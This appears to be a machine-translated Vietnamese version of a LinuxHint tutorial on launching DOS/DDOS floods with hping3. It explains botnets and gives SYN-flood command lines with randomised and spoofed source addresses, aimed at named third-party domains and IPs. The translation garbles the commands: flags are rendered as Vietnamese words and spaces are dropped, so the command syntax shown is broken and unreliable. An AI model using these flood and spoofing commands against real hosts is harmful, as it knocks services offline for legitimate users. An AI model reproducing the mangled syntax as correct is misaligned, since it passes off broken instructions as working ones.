hping3 lũ ddos

Hping3 Flood Ddos



Hướng dẫn này tập trung vào các cuộc tấn công DDOS (Từ chối Dịch vụ Phân tán) bằng cách sử dụng công cụ hping3. Nếu bạn đã quen với các cuộc tấn công DOS (Từ chối dịch vụ) và DDOS, bạn có thể tiếp tục đọc các hướng dẫn thực hành của hping3, nếu không, bạn nên tìm hiểu về cách thức hoạt động của các cuộc tấn công này.

Tấn công DOS


Tấn công từ chối dịch vụ (DOS) là một kỹ thuật rất đơn giản để từ chối khả năng truy cập vào các dịch vụ (đó là lý do tại sao nó được gọi là tấn công từ chối dịch vụ). Cuộc tấn công này bao gồm việc làm quá tải mục tiêu với các gói tin quá khổ hoặc một số lượng lớn chúng.







Mặc dù cuộc tấn công này rất dễ thực hiện, nó không làm tổn hại đến thông tin hoặc quyền riêng tư của mục tiêu, nó không phải là một cuộc tấn công xâm nhập và chỉ nhằm mục đích ngăn chặn truy cập vào mục tiêu.
Bằng cách gửi một lượng gói tin mà mục tiêu không thể xử lý, những kẻ tấn công sẽ ngăn chặn máy chủ phục vụ người dùng hợp pháp.



Các cuộc tấn công DOS được thực hiện từ một thiết bị duy nhất, do đó có thể dễ dàng ngăn chặn chúng bằng cách chặn IP của kẻ tấn công, tuy nhiên kẻ tấn công có thể thay đổi và thậm chí giả mạo (sao chép) địa chỉ IP mục tiêu nhưng không khó để tường lửa đối phó với các cuộc tấn công như vậy , trái ngược với những gì xảy ra với các cuộc tấn công DDOS.



Tấn công DDOS

Tấn công từ chối dịch vụ phân tán (DDOS) tương tự như tấn công DOS nhưng được thực hiện đồng thời từ các nút khác nhau (hoặc những kẻ tấn công khác nhau). Các cuộc tấn công DDOS thường được thực hiện bởi các mạng botnet. Botnet là các tập lệnh hoặc chương trình tự động lây nhiễm vào máy tính để thực hiện một nhiệm vụ tự động (trong trường hợp này là một cuộc tấn công DDOS). Một tin tặc có thể tạo một mạng botnet và lây nhiễm cho nhiều máy tính mà từ đó các mạng botnet sẽ khởi chạy các cuộc tấn công DOS, thực tế là nhiều mạng botnet đang bắn đồng thời biến cuộc tấn công DOS thành một cuộc tấn công DDOS (đó là lý do tại sao nó được gọi là phân tán).





Tất nhiên, vẫn có những trường hợp ngoại lệ trong đó các cuộc tấn công DDOS được thực hiện bởi những kẻ tấn công người thật, ví dụ như nhóm tin tặc Anonymous được tích hợp bởi hàng nghìn người trên toàn thế giới đã sử dụng kỹ thuật này rất thường xuyên do nó dễ thực hiện (nó chỉ yêu cầu những người tình nguyện chia sẻ nguyên nhân của họ), đó là ví dụ như cách Anonymous khiến chính phủ Libya của Gaddafi bị ngắt kết nối hoàn toàn trong cuộc xâm lược, nhà nước Libya không còn khả năng phòng vệ trước hàng nghìn kẻ tấn công từ khắp nơi trên thế giới.

Loại tấn công này, khi được thực hiện từ nhiều nút khác nhau, cực kỳ khó ngăn chặn và ngăn chặn và thường yêu cầu phần cứng đặc biệt để đối phó, điều này là do tường lửa và các ứng dụng phòng thủ không được chuẩn bị để đối phó với hàng nghìn kẻ tấn công đồng thời. Đây không phải là trường hợp của hping3, hầu hết các cuộc tấn công được thực hiện thông qua công cụ này sẽ bị chặn bởi các thiết bị hoặc phần mềm phòng thủ, tuy nhiên nó rất hữu ích trong các mạng cục bộ hoặc chống lại các mục tiêu được bảo vệ kém.



Giới thiệu về hping3

Công cụ hping3 cho phép bạn gửi các gói được thao tác. Công cụ này cho phép bạn kiểm soát kích thước, số lượng và sự phân mảnh của các gói để làm quá tải mục tiêu và vượt qua hoặc tấn công tường lửa. Hping3 có thể hữu ích cho mục đích bảo mật hoặc kiểm tra khả năng, sử dụng nó, bạn có thể kiểm tra hiệu quả của tường lửa và nếu máy chủ có thể xử lý một lượng lớn gói tin. Dưới đây, bạn sẽ tìm thấy hướng dẫn về cách sử dụng hping3 cho mục đích kiểm tra bảo mật.

Bắt đầu với các cuộc tấn công DDOS bằng hping3:

Trên các bản phân phối Debian và dựa trên Linux, bạn có thể cài đặt hping3 bằng cách chạy:

#đúng cáchTải vềhping3-và

Một cuộc tấn công DOS (không phải DDOS) đơn giản sẽ là:

#sudohping3-NS --lụt -V -P 80170.155.9.185

Ở đâu:
sudo: cung cấp các đặc quyền cần thiết để chạy hping3.
hping3:
gọi chương trình hping3.
-NS: chỉ định gói SYN.
-lụt: bắn theo ý mình, các câu trả lời sẽ bị bỏ qua (đó là lý do tại sao các câu trả lời sẽ không được hiển thị) và các gói tin sẽ được gửi nhanh nhất có thể.
-V: Độ dài.
-p 80: cổng 80, bạn có thể thay thế số này cho dịch vụ bạn muốn tấn công.
170.155.9.185: IP mục tiêu.

Flood sử dụng gói SYN chống lại cổng 80:

Ví dụ sau mô tả một cuộc tấn công SYN chống lại lacampora.org:

#sudohping3 lacampora.org-NS -n -NS 120 -NS -P 80 --lụt --rand-source

Ở đâu:
Lacampora.org: là mục tiêu
-NS: đầu ra ngắn gọn
-n: hiển thị IP mục tiêu thay vì máy chủ.
-d 120: đặt kích thước gói
–Rand-source: ẩn địa chỉ IP.

Ví dụ sau đây cho thấy một ví dụ khác có thể xảy ra lũ lụt:

SYN lũ chống lại cổng 80:

#sudohping3--rand-sourceivan.com-NS -NS -P 80 --lụt

Với hping3, bạn cũng có thể tấn công các mục tiêu của mình bằng IP giả, để vượt qua tường lửa, bạn thậm chí có thể sao chép chính IP mục tiêu của mình hoặc bất kỳ địa chỉ được phép nào mà bạn có thể biết (bạn có thể đạt được nó, chẳng hạn như với Nmap hoặc một trình thám thính để lắng nghe được thiết lập kết nối).

Cú pháp sẽ là:

#sudohping3-đến <IP GIẢ> <Mục tiêu> -NS -NS -P 80 - nhanh hơn -c2

Trong ví dụ thực tế này, cuộc tấn công sẽ có vẻ như:

#sudohping3-đến190.0.175.100 190.0.175.100-NS -NS -P 80 - nhanh hơn -c2

Tôi hy vọng bạn thấy hướng dẫn này về hping3 hữu ích. Tiếp tục theo dõi LinuxHint để biết thêm các mẹo và cập nhật về Linux và mạng.